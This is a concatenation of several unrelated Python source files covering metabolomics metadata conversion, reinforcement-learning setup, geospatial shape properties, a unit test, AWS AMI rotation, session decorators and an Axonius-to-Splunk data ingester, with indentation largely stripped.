p.add_argument('--s_last_name', dest='s_last_name', required=False, default="", nargs='?')
p.add_argument('--s_telephone', dest='s_telephone', required=False, default="", nargs='?')
p.add_argument('--s_fax', dest='s_fax', required=False, default="", nargs='?')
p.add_argument('--s_affiliation', dest='s_affiliation', required=False, default="", nargs='?')
p.add_argument('--s_role', dest='s_role', required=False, default="", nargs='?')
p.add_argument('--s_mail', dest='s_mail', required=False, default="", nargs='?')
p.add_argument('--s_address', dest='s_address', required=False, default="", nargs='?')
p.add_argument('--i_submission_date', dest='i_submission_date', required=False, default="", nargs='?')
p.add_argument('--i_release_date', dest='i_release_date', required=False, default="", nargs='?')
p.add_argument('--i_description', dest='i_description', required=False, default="", nargs='?')
p.add_argument('--i_pubmed', dest='i_pubmed', required=False, default="", nargs='?')
p.add_argument('--i_pub_doi', dest='i_pub_doi', required=False, default="", nargs='?')
p.add_argument('--i_pub_title', dest='i_pub_title', required=False, default="", nargs='?')
p.add_argument('--i_pub_status', dest='i_pub_status', required=False, default="", nargs='?')
p.add_argument('--i_pub_author', dest='i_pub_author', required=False, default="", nargs='?')
p.add_argument('--i_first_name', dest='i_first_name', required=False, default="", nargs='?')
p.add_argument('--i_mid_initials', dest='i_mid_initials', required=False, default="", nargs='?')
p.add_argument('--i_last_name', dest='i_last_name', required=False, default="", nargs='?')
p.add_argument('--i_telephone', dest='i_telephone', required=False, default="", nargs='?')
p.add_argument('--i_fax', dest='i_fax', required=False, default="", nargs='?')
p.add_argument('--i_affiliation', dest='i_affiliation', required=False, default="", nargs='?')
p.add_argument('--i_role', dest='i_role', required=False, default="", nargs='?')
p.add_argument('--i_mail', dest='i_mail', required=False, default="", nargs='?')
p.add_argument('--i_address', dest='i_address', required=False, default="", nargs='?')
p.add_argument('--organism_text', dest='organism_text', required=False, default="", nargs='?')
p.add_argument('--organism_ref', dest='organism_ref', required=False, default="", nargs='?')
p.add_argument('--organism_iri', dest='organism_iri', required=False, default="", nargs='?')
p.add_argument('--organism_part_text', dest='organism_part_text', required=False, default="", nargs='?')
p.add_argument('--organism_part_ref', dest='organism_part_ref', required=False, default="", nargs='?')
p.add_argument('--organism_part_iri', dest='organism_part_iri', required=False, default="", nargs='?')
p.add_argument('--organism_variant_text', dest='organism_variant_text', required=False, default="", nargs='?')
p.add_argument('--organism_variant_ref', dest='organism_variant_ref', required=False, default="", nargs='?')
p.add_argument('--organism_variant_iri', dest='organism_variant_iri', required=False, default="", nargs='?')
args = p.parse_args()
USERMETA = {'characteristics': {'organism': {'name': '', 'accession': '', 'ref': ''},
'organism_variant': {'name': '', 'accession': '', 'ref': ''},
'organism_part': {'name': '', 'accession': '', 'ref': ''},
},
'investigation': {'identifier': '', 'title': 'Investigation', 'description': '',
'submission_date': '', 'release_date': ''
},
'investigation_publication': {'pubmed': '', 'doi': '', 'author_list': '', 'title': '',
'status': {'name': '', 'accession': '', 'ref': 'PSO'},
},
'study': {
'title': '', 'description': '', 'submission_date': '', 'release_date': '',
},
'study_publication': {'pubmed': '', 'doi': '', 'author_list': '', 'title': '',
'status': {'name': '', 'accession': '', 'ref': 'PSO'},
},
'description': {'sample_collect': '', 'extraction': '', 'chroma': '', 'mass_spec': '',
'data_trans': '', 'metabo_id': ''
},
# Multiple Values Parameters
'study_contacts': [
{'first_name': '', 'last_name': '', 'mid': '', 'email': '',
'fax': '', 'phone': '', 'adress': '', 'affiliation': '',
'roles': {'name': '', 'accession': '', 'ref': ''},
},
],
'investigation_contacts': [
{'first_name': '', 'last_name': '', 'mid': '', 'email': '',
'fax': '', 'phone': '', 'adress': '', 'affiliation': '',
'roles': {'name': '', 'accession': '', 'ref': ''},
},
],
'Post Extraction': {'value': ''},
'Derivatization': {'value': ''},
'Chromatography Instrument': {'name': '', 'ref': '', 'accession': ''},
'Column type': {'value': ''},
'Column model': {'value': ''},
}
# check if using json file
if args.jsontxt and os.path.isfile(args.jsontxt):
with open(args.jsontxt, 'r') as f:
USERMETA = json.load(f)
else:
# Fill in USERMETA dictionary
USERMETA['characteristics']['organism']['value'] = args.organism_text
USERMETA['characteristics']['organism']['accession'] = args.organism_iri
USERMETA['characteristics']['organism']['ref'] = args.organism_ref
USERMETA['characteristics']['organism_variant']['value'] = args.organism_variant_text
USERMETA['characteristics']['organism_variant']['accession'] = args.organism_variant_iri
USERMETA['characteristics']['organism_variant']['ref'] = args.organism_variant_ref
USERMETA['characteristics']['organism_part']['value'] = args.organism_part_text
USERMETA['characteristics']['organism_part']['accession'] = args.organism_part_iri
USERMETA['characteristics']['organism_part']['ref'] = args.organism_part_ref
# USERMETA['investigation']['identifier'] = # uses study identifier
USERMETA['investigation']['description'] = args.i_description
USERMETA['investigation']['submission_date'] = args.i_submission_date
USERMETA['investigation']['release_date'] = args.i_release_date
USERMETA['investigation_publication']['pubmed'] = args.i_pubmed
USERMETA['investigation_publication']['author_list'] = args.i_pub_author
USERMETA['investigation_publication']['title'] = args.i_pub_title
USERMETA['investigation_publication']['doi'] = args.i_pub_doi
USERMETA['investigation_publication']['status']['name'] = ontology_lookup(args.i_pub_status, 'status')
USERMETA['investigation_publication']['status']['accession'] = args.i_pub_status
USERMETA['investigation_contacts'][0]['first_name'] = args.i_first_name
USERMETA['investigation_contacts'][0]['last_name'] = args.i_last_name
USERMETA['investigation_contacts'][0]['mid'] = args.i_mid_initials
USERMETA['investigation_contacts'][0]['email'] = args.i_mail
USERMETA['investigation_contacts'][0]['fax'] = args.i_fax
USERMETA['investigation_contacts'][0]['phone'] = args.i_telephone
USERMETA['investigation_contacts'][0]['adress'] = args.i_address
USERMETA['investigation_contacts'][0]['affiliation'] = args.i_affiliation
USERMETA['investigation_contacts'][0]['roles']['name'] = ontology_lookup(args.i_role, 'role')
USERMETA['investigation_contacts'][0]['roles']['accession'] = args.i_role
USERMETA['study']['title'] = args.study_title
USERMETA['study']['description'] = args.s_description
USERMETA['study']['submission_date'] = args.s_submission_date
USERMETA['study']['release_date'] = args.s_release_date
USERMETA['study_publication']['pubmed'] = args.s_pubmed
USERMETA['study_publication']['author_list'] = args.s_pub_author
USERMETA['study_publication']['title'] = args.s_pub_title
USERMETA['study_publication']['doi'] = args.s_pub_doi
USERMETA['study_publication']['status']['name'] = ontology_lookup(args.s_pub_status, 'status')
USERMETA['study_publication']['status']['accession'] = args.s_pub_status
USERMETA['study_contacts'][0]['first_name'] = args.s_first_name
USERMETA['study_contacts'][0]['last_name'] = args.s_last_name
USERMETA['study_contacts'][0]['mid'] = args.s_mid_initials
USERMETA['study_contacts'][0]['email'] = args.s_mail
USERMETA['study_contacts'][0]['fax'] = args.s_fax
USERMETA['study_contacts'][0]['phone'] = args.s_telephone
USERMETA['study_contacts'][0]['adress'] = args.s_address
USERMETA['study_contacts'][0]['affiliation'] = args.s_affiliation
USERMETA['study_contacts'][0]['roles']['name'] = ontology_lookup(args.s_role, 'role')
USERMETA['study_contacts'][0]['roles']['accession'] = args.s_role
try:
from mzml2isa.parsing import full_parse
# import progressbar as pb
# parse the files
full_parse(args.inputzip, args.out_dir, args.study_title, usermeta=USERMETA, split=True, merge=False, verbose=True,
multip=False)
except ImportError:
import tempfile
temp = tempfile.NamedTemporaryFile()
temp.write(json.dumps(USERMETA))
temp.seek(0)
os.system("mzml2isa -i %s -o %s -s %s -m %s" % (args.inputzip, args.out_dir, args.study_title, temp.name))
temp.close()
    html_code = '<a href="%s/a_%s_metabolite_profiling_mass_spectrometry.txt">a_%s_metabolite_profiling_mass_spectrometry.txt</a>' \
                '<br/><a href="%s/i_Investigation.txt">i_Investigation.txt</a><br/>' \
                '<a href="%s/s_%s.txt">s_%s.txt</a><br/>' % tuple([args.study_title] * 7)
with open(args.html_file, 'wb') as f:
f.write(html_code)
if __name__ == "__main__":
main()
|
# coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This is a modified version of the original file
"""VTrace (IMPALA) learner for Google Research Football.
"""
from absl import app
from absl import flags
from absl import logging
from seed_rl.agents.vtrace import learner
from seed_rl.common import actor
from seed_rl.common import common_flags
from seed_rl.football import env
from seed_rl.football import networks
from seed_rl.football.networks.gfootball import create_network as GFootball
from seed_rl.football.networks.gfootball_lstm import create_network as GFootballLSTM
from seed_rl.football.networks.gfootball_lite import create_network as GFootballLite
from seed_rl.football.networks.vtrace_mlp_and_lstm import create_network as VtraceMLPandLSTM
from seed_rl.football.networks.gfootball_flex import create_network as GFootballFlex
from seed_rl.football.networks.gfootball_flex20 import create_network as GFootballFlex20
from seed_rl.football.networks.gfootball_role_aware import create_network as GFootballRoleAware
import tensorflow as tf
FLAGS = flags.FLAGS
# Optimizer settings.
flags.DEFINE_float('learning_rate', 0.00048, 'Learning rate.')
KNOWN_NETWORKS = {
'GFootball': GFootball,
'GFootballLSTM': GFootballLSTM,
'GFootballLite': GFootballLite,
'GFootballFlex': GFootballFlex,
'GFootballFlex20': GFootballFlex20,
'GFootballRoleAware': GFootballRoleAware,
'VtraceMLPandLSTM': VtraceMLPandLSTM
}
def create_agent(action_space, env_observation_space,
parametric_action_distribution, extended_network_config={}):
network_config = extended_network_config.copy()
network_config['action_space'] = action_space
network_config['env_observation_space'] = env_observation_space
network_config['parametric_action_distribution'] = parametric_action_distribution
if 'network_name' in network_config:
network_name = network_config['network_name']
else:
network_name = 'GFootball'
        logging.warning('No network_name provided; the default GFootball network will be used.')
logging.info('Creating network %s with parameters: %s', network_name, str(network_config))
return KNOWN_NETWORKS[network_name](network_config)
def create_optimizer(unused_final_iteration):
learning_rate_fn = lambda iteration: FLAGS.learning_rate
optimizer = tf.keras.optimizers.Adam(FLAGS.learning_rate)
return optimizer, learning_rate_fn
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if FLAGS.run_mode == 'actor':
actor.actor_loop(env.create_environment)
elif FLAGS.run_mode == 'learner':
learner.learner_loop(env.create_environment,
create_agent,
create_optimizer)
else:
raise ValueError('Unsupported run mode {}'.format(FLAGS.run_mode))
if __name__ == '__main__':
app.run(main)
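# Illustrative sketch of how the network is chosen: the optional 'network_name' key in the
# extended network config selects an entry from KNOWN_NETWORKS, falling back to 'GFootball'.
# The config value below is a placeholder.
def _example_network_lookup():
    config = {'network_name': 'GFootballLSTM'}
    name = config.get('network_name', 'GFootball')
    return KNOWN_NETWORKS[name]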
|
import json
import logging
import fiona
from pywps import LiteralInput, ComplexInput, ComplexOutput
from pywps import Process, FORMATS
from rasterio.crs import CRS
from shapely.geometry import shape
from raven.utils import archive_sniffer, crs_sniffer, single_file_check
from raven.utils import geom_transform, geom_prop, multipolygon_check
LOGGER = logging.getLogger("PYWPS")
class ShapePropertiesProcess(Process):
"""Given a file containing vector data, provide general information and spatial characteristics."""
def __init__(self):
inputs = [
ComplexInput('shape', 'Vector Shape',
abstract='An ESRI Shapefile, GML, GeoPackage, JSON or GeoJSON file.'
' The ESRI Shapefile must be zipped and contain the .shp, .shx, and .dbf.',
supported_formats=[FORMATS.GML, FORMATS.GEOJSON, FORMATS.SHP, FORMATS.JSON, FORMATS.ZIP],
min_occurs=1, max_occurs=1),
LiteralInput('projected_crs',
'Coordinate Reference System for area calculation (Default: EPSG:6622,'
' NAD83(CSRS) / Quebec Lambert)',
data_type='integer',
default=6622,
min_occurs=1, max_occurs=1)]
outputs = [
ComplexOutput('properties', 'Feature schemas',
abstract='Geographic representations and descriptions of shape properties: '
'centroid coordinates, area, perimeter and gravelius index.',
supported_formats=[FORMATS.JSON],
),
]
super(ShapePropertiesProcess, self).__init__(
self._handler,
identifier="shape-properties",
title="Shape Properties",
version="1.0",
abstract="Return shape area in square metres based on line boundaries of a polygonal vector file.",
metadata=[],
inputs=inputs,
outputs=outputs,
status_supported=True,
store_supported=True)
def _handler(self, request, response):
shape_url = request.inputs['shape'][0].file
projected_crs = request.inputs['projected_crs'][0].data
extensions = ['.gml', '.shp', '.gpkg', '.geojson', '.json']
vector_file = single_file_check(archive_sniffer(shape_url, working_dir=self.workdir, extensions=extensions))
shape_crs = crs_sniffer(vector_file)
try:
projection = CRS.from_epsg(projected_crs)
if projection.is_geographic:
msg = 'Desired CRS {} is geographic. ' \
'Areal analysis values will be in decimal-degree units.'.format(projection.to_epsg())
LOGGER.warning(msg)
except Exception as e:
msg = '{}: Failed to parse CRS definition. Exiting.'.format(e)
LOGGER.error(msg)
raise Exception(msg)
properties = []
try:
for i, layer_name in enumerate(fiona.listlayers(vector_file)):
with fiona.open(vector_file, 'r', crs=shape_crs, layer=i) as src:
for feature in src:
geom = shape(feature['geometry'])
multipolygon_check(geom)
transformed = geom_transform(geom, source_crs=shape_crs, target_crs=projection)
prop = {'id': feature['id']}
prop.update(feature['properties'])
prop.update(geom_prop(transformed))
# Recompute the centroid location using the original projection
prop['centroid'] = geom_prop(geom)['centroid']
properties.append(prop)
except Exception as e:
msg = '{}: Failed to extract features from shape {}'.format(e, vector_file)
LOGGER.error(msg)
raise Exception(msg)
response.outputs['properties'].data = json.dumps(properties)
return response
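# Hedged sketch of the Gravelius (compactness) index that geom_prop is assumed to report:
# the ratio of the shape's perimeter to the circumference of a circle with the same area,
# where values close to 1 indicate a near-circular shape. Inputs are placeholder values in metres.
def _example_gravelius_index(perimeter_m, area_m2):
    import math
    return perimeter_m / (2 * math.sqrt(math.pi * area_m2))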
|
from keyfunctions import create_key
from keyfunctions import create_element_rand
import keyfunctions.globals as consts
import random
import unittest
import struct
class CoreTestSuite(unittest.TestCase):
"""Testing of core functions."""
def test_createKey(self):
key = create_key([0.2, 0.001, 0.223], 10)
self.assertEqual(key, convert("0055401502"))
key = create_key([0.92, 0.12001, 0.11223], 10)
self.assertEqual(key, convert("1116763170"))
key = create_key([0.92, 0.12001, 0.11223], 2)
self.assertEqual(key, convert("11"))
def test_createKey5dims(self):
for size in [0, 2, 3, 10, 17]:
key = create_key([random.random() for i in range(5)], size)
self.assertEqual(len(key), size)
def test_create_element_rand(self):
long_value = (1039935063 << 32) + 24434444
self.assertEqual(long_value, 4466487085573134092)
rand = create_element_rand(struct.pack('q', long_value))
self.assertEqual(rand, 411538470)
rand = create_element_rand(long_value)
self.assertEqual(rand, 411538470)
def convert(key):
    return "".join(map(lambda c: chr(int(c) + consts.PRINTABLE_OFFSET), key))
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python
#
# Modules Import
#
import argparse
import boto3
import json
import os
import requests
import sys
import time
from operator import itemgetter
#
# Variables Definition
#
instance_id_metadata_url = 'http://169.254.169.254/latest/meta-data/instance-id'
#
# Function to parse the input arguments and build the help message
#
def arguments_parser():
parser = argparse.ArgumentParser(
description='Tool to create and rotate EC2 AMIs and associated snapshots',
add_help=True
)
options = parser.add_argument_group('Options')
options.add_argument(
'-n', '--name',
type=str,
action='store',
dest='ami_name',
required=True,
help='Name for the AMI to create or rotate'
)
options.add_argument(
'-t', '--time',
action='store_true',
dest='time',
        help='Add the time to the name format: AMI_NAME-YYYY_MM_DD-HH_MM (default: AMI_NAME-YYYY_MM_DD)'
)
options.add_argument(
'-d', '--description',
type=str,
action='store',
dest='ami_description',
default='TBD',
help='Description for the AMI to create (default: AMI_NAME AMI created by ' + os.path.basename(sys.argv[0]) + ')'
)
options.add_argument(
'-i', '--instance-id',
type=str,
action='store',
dest='instance_id',
default='TBD',
help='Instance ID from which create the AMI (default: Self Instance ID)'
)
options.add_argument(
'-r', '--reboot',
action='store_true',
dest='reboot',
help='Reboot the instance to create the AMI (default: No reboot)'
)
options.add_argument(
'-b', '--block-device-mappings',
type=str,
action='store',
dest='block_device_list_json',
default='TBD',
help='JSON format list of one or more block device mappings to include in the AMI (default: Include all block device mappings attached to the instance)'
)
options.add_argument(
'-c', '--rotation-copies',
type=int,
action='store',
dest='copies_number',
default=10,
help='Number of copies for rotation (default: 10)'
)
options.add_argument(
'-p', '--profile',
type=str,
action='store',
dest='profile',
default='default',
help='Use a specific profile from AWS CLI stored configurations'
)
commands = parser.add_argument_group('Actions')
commands.add_argument(
'command',
type=str,
choices=['create', 'rotate'],
help='Command to execute'
)
args = parser.parse_args()
return args
#
# Function to print the boto3 responses in JSON format
#
def json_response(response):
return json.dumps(
response,
default=str,
sort_keys=True,
indent=4,
separators=(',', ': ')
)
#
# Function to create a session of boto3 to interact with the AWS account
#
def create_session():
profile = arguments.profile
if (profile != 'default') and (not profile in boto3.session.Session().available_profiles):
print("\nThe '" + profile + "' profile does not exist!\n")
elif (profile == 'default') and (boto3.session.Session().get_credentials() is None):
print("\nThere is no AWS CLI configuration defined!\n")
elif profile != 'default':
return boto3.session.Session(profile_name=profile)
else:
return boto3.session.Session()
print("Please provide AWS configuration, e.g. via the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_DEFAULT_REGION environment variables\n")
exit(-1)
#
# Function to deregister an AMI and delete its associated snapshots
#
# Input argument => ami_info : Dictionary that contains the AMI attributes
#
def deregister_ami(ami_info):
# Deregister the AMI
image_id = str(ami_info['ImageId'])
print("\nDeregister '" + image_id + "' AMI with '" + ami_info['Name'] + "' name:")
response = ec2.deregister_image(ImageId=image_id)
print(json_response(response))
# Delete the associated snapshots
for device in ami_info['BlockDeviceMappings']:
# If device is an EBS volume, it proceeds to delete the associated snapshot
if 'Ebs' in device:
snapshot_id = str(device['Ebs']['SnapshotId'])
print("\nDelete '" + snapshot_id + "' associated snapshot:")
response = ec2.delete_snapshot(SnapshotId=snapshot_id)
print(json_response(response))
#
# Main
#
# Parse input arguments
arguments = arguments_parser()
session = create_session()
ec2 = session.client('ec2')
# If the specified action is 'create', the following block is executed
if (arguments.command == 'create'):
# Definition of required parameters to create AMIs
if arguments.time:
actual_date = time.strftime('%Y_%m_%d-%H_%M')
else:
actual_date = time.strftime('%Y_%m_%d')
ami_name = arguments.ami_name + '-' + actual_date
if (not arguments.ami_description) or (arguments.ami_description == 'TBD'):
ami_description = arguments.ami_name + ' AMI created by ' + os.path.basename(sys.argv[0])
else:
ami_description = arguments.ami_description
if (not arguments.instance_id) or (arguments.instance_id == 'TBD'):
try:
instance_id = str(requests.get(instance_id_metadata_url, timeout=3).text)
except requests.exceptions.RequestException as err:
print("\nThis is not an EC2 instance, so --instance_id option must be specified\n")
os.system(__file__ + ' --help')
exit(1)
else:
instance_id = arguments.instance_id
if (not arguments.block_device_list_json) or (arguments.block_device_list_json == 'TBD'):
block_device_list_json = None
else:
block_device_list_json = json.loads(arguments.block_device_list_json)
# Check if there is already an AMI created with ami_name name
response = ec2.describe_images(
Filters=[{
'Name': 'name',
'Values': [ami_name]
}],
Owners=['self']
)
# If there is already an AMI created with ami_name name, it proceeds to deregister in order to create it again
if (response['Images']) and (response['Images'][0]['Name'] == ami_name):
print("\nAn AMI with '" + ami_name + "' name already exists. This AMI will be deregistered before creating the new one...")
deregister_ami(response['Images'][0])
print("\nCreate '" + ami_name + "' AMI with '" + ami_description + "' description from '" + instance_id + "' instance:")
if block_device_list_json is None:
if arguments.reboot:
response = ec2.create_image(
InstanceId=instance_id,
Name=ami_name,
Description=ami_description
)
else:
response = ec2.create_image(
InstanceId=instance_id,
Name=ami_name,
Description=ami_description,
NoReboot=True
)
else:
if arguments.reboot:
response = ec2.create_image(
InstanceId=instance_id,
Name=ami_name,
Description=ami_description,
BlockDeviceMappings=block_device_list_json
)
else:
response = ec2.create_image(
InstanceId=instance_id,
Name=ami_name,
Description=ami_description,
BlockDeviceMappings=block_device_list_json,
NoReboot=True
)
print(json_response(response))
# If the specified action is 'rotate', the following block is executed
if (arguments.command == 'rotate'):
# Definition of required parameters to rotate AMIs
if arguments.time:
filter_date = '????_??_??-??_??'
else:
filter_date = '????_??_??'
filter_name = arguments.ami_name + '-' + filter_date
rotation_copies = arguments.copies_number
# Get the list of registered AMIs which name match the filter_name pattern
response = ec2.describe_images(
Filters=[{
'Name': 'name',
'Values': [filter_name]
}],
Owners=['self']
)
# Sort the AMIs list by the 'Name' attribute
sorted_images = sorted(response['Images'], key=itemgetter('Name'), reverse=True)
print("\nAMIs currently registered:\n")
for ami in sorted_images:
print("\t" + ami['Name'])
if (len(sorted_images) > rotation_copies):
if (len(sorted_images) - rotation_copies) == 1:
print("\nThere is " + str(len(sorted_images) - rotation_copies) + " AMI to deregister...")
else:
print("\nThere are " + str(len(sorted_images) - rotation_copies) + " AMIs to deregister...")
try:
# Python 2 forward compatibility
range = xrange
except NameError:
pass
for i in range(rotation_copies, len(sorted_images)):
deregister_ami(sorted_images[i])
else:
print("\nThe number of registered AMIs with '" + filter_name + "' name pattern is less or equal than the rotation copies number. No need to deregister any AMIs\n")
|
from .models import Session
from .utils import Utilities
from mongoengine import DoesNotExist
def check_args(required_args: list[str], optional_args: list[str], types: dict[str, tuple[type]]):
def decorator(func):
def wrapper(*_, **args):
for arg in required_args:
if arg not in args or not isinstance(args[arg], types[arg]):
return Utilities.make_reponse(400, 'Invalid parameters')
for arg in args:
if (arg not in optional_args and arg not in required_args) or not isinstance(args[arg], types[arg]):
return Utilities.make_reponse(400, 'Invalid parameters')
return func(*_, **args)
return wrapper
return decorator
def check_token(is_auth=False):
def decorator(func):
def wrapper(*args, **kwargs):
try:
session = Session.objects.get(token=kwargs['token'])
if is_auth and not session.is_auth:
return Utilities.make_reponse(403, 'Session is not authorized')
except DoesNotExist:
return Utilities.make_reponse(404, 'Session not found')
return func(*args, **kwargs)
return wrapper
return decorator
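# Minimal usage sketch (the handler and argument names are hypothetical): the type map must
# include every accepted keyword, including 'token', so that check_args passes it through
# before check_token looks the session up.
@check_token(is_auth=True)
@check_args(['token', 'name'], ['note'], {'token': (str,), 'name': (str,), 'note': (str,)})
def _example_update_profile(**kwargs):
    return Utilities.make_reponse(200, 'OK')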
|
# encoding = utf-8
import datetime
import json
import os
import re
import requests
import sys
import time
class Config:
supported_minimum_version: str = "4.4.0"
retry_standoff: list = [0, 5, 10, 15, 30, 60]
request_timeout: int = 900
class API:
def __init__(self, url, api_key, api_secret, verify=False, timeout=900):
self._url = url
self._api_key = api_key
self._api_secret = api_secret
self._verify = verify
self._timeout = timeout
def _rest_base(self, method, api_endpoint, data=None, params=None, headers={}):
requests_method = getattr(requests, method)
response = None
exception = None
req = None
try:
headers['api-key'] = self._api_key
headers['api-secret'] = self._api_secret
if True == self._verify:
req = requests_method(f"{self._url}{api_endpoint}", timeout=self._timeout, params=params, data=json.dumps(data), headers=headers)
else:
req = requests_method(f"{self._url}{api_endpoint}", timeout=self._timeout, params=params, data=json.dumps(data), headers=headers, verify=self._verify)
except Exception as e:
exception = e
req_status_code = None
if req is not None:
req_status_code = req.status_code
req_json = {"data": ""}
if req is not None:
req_json = req.json()
return (req_status_code, req_json, exception)
def get(self, api_endpoint, data=None, params=None, headers={}):
return self._rest_base("get", api_endpoint, data=data, params=params, headers=headers)
def post(self, api_endpoint, data=None, params=None, headers={}):
return self._rest_base("post", api_endpoint, data=data, params=params, headers=headers)
class Metadata:
def __init__(self, api):
self._api = api
self._api_endpoint = "/api/settings/metadata"
def get_version(self):
status, response, exception = self._api.get(self._api_endpoint)
if status == 200 and response is not None and exception is None:
return response["Installed Version"]
else:
raise Exception(f"Critical Error! Status Code: '{status}' Exception: '{exception}'")
class SavedQueries:
def __init__(self, api, base_api_endpoint):
self._api = api
self._api_endpoint = base_api_endpoint
self._queries = {}
def get_attributes_by_name(self, query_name):
uuid = None
if False == bool(self._queries):
status, response, exception = self._api.get(f"{self._api_endpoint}/views/saved")
if exception is not None:
raise Exception(exception)
for query in response["data"]:
self._queries[query["attributes"]["name"]] = query["attributes"]["uuid"]
if query_name in self._queries.keys():
uuid = self._queries[query_name]
if uuid is not None:
for query in response["data"]:
if query["attributes"]["uuid"] == uuid:
query_filter = query["attributes"]["view"]["query"]["filter"]
query_fields = query["attributes"]["view"]["fields"]
else:
raise Exception(f"Critical error: The saved query '{query_name}' does not exist")
return (uuid, query_filter, query_fields)
class EntitySearch:
def __init__(self, api, entity_type, page_size=1000, logger_callback=None):
if entity_type not in ["devices", "users"]:
raise Exception(f"{entity} is not a valid entity type")
self._api = api
self._api_endpoint = f"/api/{entity_type}"
self._page_size = page_size
self._cursor = None
self._logger_callback = logger_callback
self._uuid = None
self._query_filter = None
self._query_fields = None
def _log(self, msg):
if self._logger_callback is not None:
self._logger_callback(msg)
def get(self):
response = { "data": "init" }
entities = []
offset = 0
cursor = None
while response["data"]:
data = {
"data": {
"type": "entity_request_schema",
"attributes": {
"page": {
"offset": offset,
"limit": self._page_size
},
"use_cache_entry": False,
"always_cached_query": False,
"get_metadata": True,
"include_details": True
}
}
}
status, response, exception = self._api.post(self._api_endpoint, data)
if status == 200 and response is not None and exception is None:
for device in response["data"]:
entities.append(device["attributes"])
offset += self._page_size
else:
raise Exception(f"Critical Error! Status Code: {status}\tException: {exception}")
return entities
def execute_saved_query(self, name, standoff=0, shorten_field_names=False, dynamic_field_mapping={}, incremental_ingest=False, batch_callback=None):
try:
ax_saved_queries = SavedQueries(self._api, self._api_endpoint)
if self._uuid is None or self._query_filter is None or self._query_fields is None:
self._uuid, self._query_filter, self._query_fields = ax_saved_queries.get_attributes_by_name(name)
if True == incremental_ingest:
if "specific_data.data.fetch_time" not in self._query_fields:
self._query_fields.append("specific_data.data.fetch_time")
response = { "data": "init" }
entities = []
entity_count = 0
while response["data"]:
data = {
"data": {
"type": "entity_request_schema",
"attributes": {
"use_cache_entry": False,
"always_cached_query": False,
"filter": self._query_filter,
"fields": {
"devices": self._query_fields
},
"page": {
"limit": self._page_size
},
"get_metadata": True,
"include_details": True,
"use_cursor": True,
"cursor_id": self._cursor
}
}
}
status, response, exception = self._api.post(self._api_endpoint, data=data)
if status == 200 and response is not None and exception is None:
if "meta" in response:
self._cursor = response["meta"]["cursor"]
for device in response["data"]:
entity_row = {}
for field in data['data']['attributes']['fields']['devices']:
field_name = field
if True == shorten_field_names:
field_name = field.replace("specific_data.data.", "").replace("adapters_data.", "")
if field_name in dynamic_field_mapping.keys():
field_name = dynamic_field_mapping[field_name]
if field in device['attributes']:
entity_row[field_name] = device['attributes'][field]
else:
entity_row[field_name] = device['attributes'][f"{field}_details"]
entities.append(entity_row)
else:
response = { "data": None }
else:
raise Exception(f"Critical Error! Status Code: '{status}' Exception: '{exception}'")
if standoff > 0:
time.sleep(standoff)
if batch_callback is not None:
if len(entities) > 0:
batch_callback(entities)
entity_count += len(entities)
entities = []
except Exception as ex:
raise Exception(f"Critical Error! Status Code: Exception: {ex}")
class EventWriter:
def __init__(self, incremental_data_ingest=False, remove_fetch_time_field=False, checkpoint=None, host=None, source=None, index=None, sourcetype=None, helper=None, event_writer=None):
self._incremental_data_ingest = incremental_data_ingest
self._remove_fetch_time_field = remove_fetch_time_field
self._checkpoint = checkpoint
self._host = host
self._source = source
self._index = index
self._sourcetype = sourcetype
self._helper = helper
self._event_writer = event_writer
self._entity_count = 0
self._page = 0
self._events_written = 0
def process_batch(self, entities):
# Update entity count
self._entity_count += len(entities)
# Increment page number
self._page += 1
# Log page number and size
self._helper.log_info(f"STATS - Processing page {self._page}, size {len(entities)}")
# Process each entity
for entity in entities:
if True == self._incremental_data_ingest:
                # Determine the fetch_time field name, allowing for shortened field names
                fetch_time_field_name = "fetch_time" if "fetch_time" in entity else "specific_data.data.fetch_time"
                # Create a timestamp from the device's fetch_time field
                entity_fetch_time = datetime.datetime.strptime(entity[fetch_time_field_name], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
                # Remove the fetch_time field if it was not part of the saved query's query_field definition
                if True == self._remove_fetch_time_field:
                    entity.pop(fetch_time_field_name)
                # Create event
                event = self._helper.new_event(source=self._source, host=self._host, index=self._index, sourcetype=self._sourcetype, data=json.dumps(entity))
                # Add event if no checkpoint is defined yet, or if fetch time is greater than the checkpoint time
                if self._checkpoint is None:
                    self._event_writer.write_event(event)
                    self._events_written += 1
                elif entity_fetch_time > self._checkpoint:
                    self._event_writer.write_event(event)
                    self._events_written += 1
else:
# Create event
event = self._helper.new_event(source=self._source, host=self._host, index=self._index, sourcetype=self._sourcetype, data=json.dumps(entity))
# Write event
self._event_writer.write_event(event)
self._events_written += 1
def get_entity_count(self):
return self._entity_count
def get_events_written(self):
return self._events_written
def validate_input(helper, definition):
# get Axonius configuration
api_host = definition.parameters.get('api_host', str)
api_key = definition.parameters.get('api_key', "")
api_secret = definition.parameters.get('api_secret', "")
# get selected saved query info
entity_type = definition.parameters.get('entity_type', str)
saved_query = definition.parameters.get('saved_query', str)
# get extra options
page_size = definition.parameters.get('page_size', str)
api_standoff = definition.parameters.get('standoff_ms', str)
ssl_certificate_path = definition.parameters.get('ssl_certificate_path', "")
enforce_ssl_validation = definition.parameters.get('enforce_ssl_validation')
try:
if int(page_size) < 1:
raise ValueError("Page Size must be an integer greater than 0")
if int(api_standoff) < 0:
raise ValueError("API Standoff must be an integer greater or equal to 0")
except Exception as ex:
raise ValueError(ex)
# Create api object
try:
verify = True
helper.log_info(f"enforce_ssl_validation: {enforce_ssl_validation}")
if str(enforce_ssl_validation).lower() not in ["1", "true"]:
verify = False
helper.log_info(f"verify: {verify}")
if ssl_certificate_path is not None:
if len(ssl_certificate_path) > 0:
verify = ssl_certificate_path
api = API(api_host, str(api_key), str(api_secret), verify)
search = EntitySearch(api, "devices", 1000)
out = search.get()
except Exception as ex:
helper.log_info(ex)
if "Could not find a suitable TLS CA certificate bundle" in str(ex):
raise ValueError("Critical Error, check CA Bundle Path exists and the splunk user has proper permissions")
